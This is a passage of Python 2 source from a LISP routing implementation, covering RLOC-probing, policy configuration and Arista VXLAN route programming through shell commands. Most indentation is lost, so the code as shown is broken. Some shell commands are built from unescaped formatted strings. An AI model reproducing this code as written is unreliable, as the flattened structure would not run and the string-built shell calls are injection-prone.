return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probing
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
            # same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
            # Suppress sending an RLOC-probe if we just received a nonce-echo
            # in the last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
            # Check if we have not received an RLOC-probe reply for one
            # timer interval. If we haven't, put the RLOC in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
            # egress interface to the same RLOC address. Install a host
            # route for the RLOC so we can direct the RLOC-probe out a
            # specific egress interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
            astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
        # Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
    # When the xtr-parameter indicates to register all RTRs, we register them
    # regardless of status, so suppress the IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
    # Check if the RTR address is in the RTR-list the lisp-itr process learned
    # from the map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
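#
# Example of the IPC message built above (RTR address hypothetical), in the
# "rtr%<address>%<up|down>" format:
#
#   rtr%128.107.81.1%down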
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (mrloc.multicast_rloc_probe_list.has_key(map_reply_addr) == False):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
    # maybe the same ETR is sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
    #endfor
    return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
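#
# Example (MAC values hypothetical): lisp_format_macs("0050b6e0a1c2",
# "00a0c9143b5f") returns "0050-b6e0-a1c2 -> 00a0-c914-3b5f".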
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
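#
# Example (buffer contents hypothetical): for a packet payload of
# "node-dallas\0<rest>", this returns ("<rest>", "node-dallas") -- the name is
# accumulated up to (but not including) the NULL byte and the returned packet
# is advanced past it.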
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
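#
# Illustrative shape of the kv_pair passed to lisp_policy_command(). The
# "set-*" and "policy-name" values are scalars; the match keywords are
# parallel arrays with one element per match clause (values below are made
# up):
#
#   { "policy-name" : "policy1", "datetime-range" : ["", ""],
#     "source-eid" : ["10.1.0.0/16", "10.2.0.0/16"], "set-action" : "drop" }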
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
    # Derive MAC address from VTEP address and associate it with the next-hop
    # address on vlan4094. This MAC address must be the MAC address on the
    # foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT, so we data encapsulate it with a source-port of 4341 and a
# destination address and port that were translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
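#
# Illustrative return value, assuming a single IPv4 default route via
# 192.168.1.1 on device eth0:
#
#   [["eth0", "192.168.1.1"]]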
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
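#
# Illustrative examples of the commands issued (addresses are made up):
#
#   lisp_install_host_route("10.0.0.1", "192.168.1.254", True)
#     -> "ip route add 10.0.0.1/32 via 192.168.1.254"
#   lisp_install_host_route("10.0.0.1", None, False)
#     -> "ip route delete 10.0.0.1/32"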
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
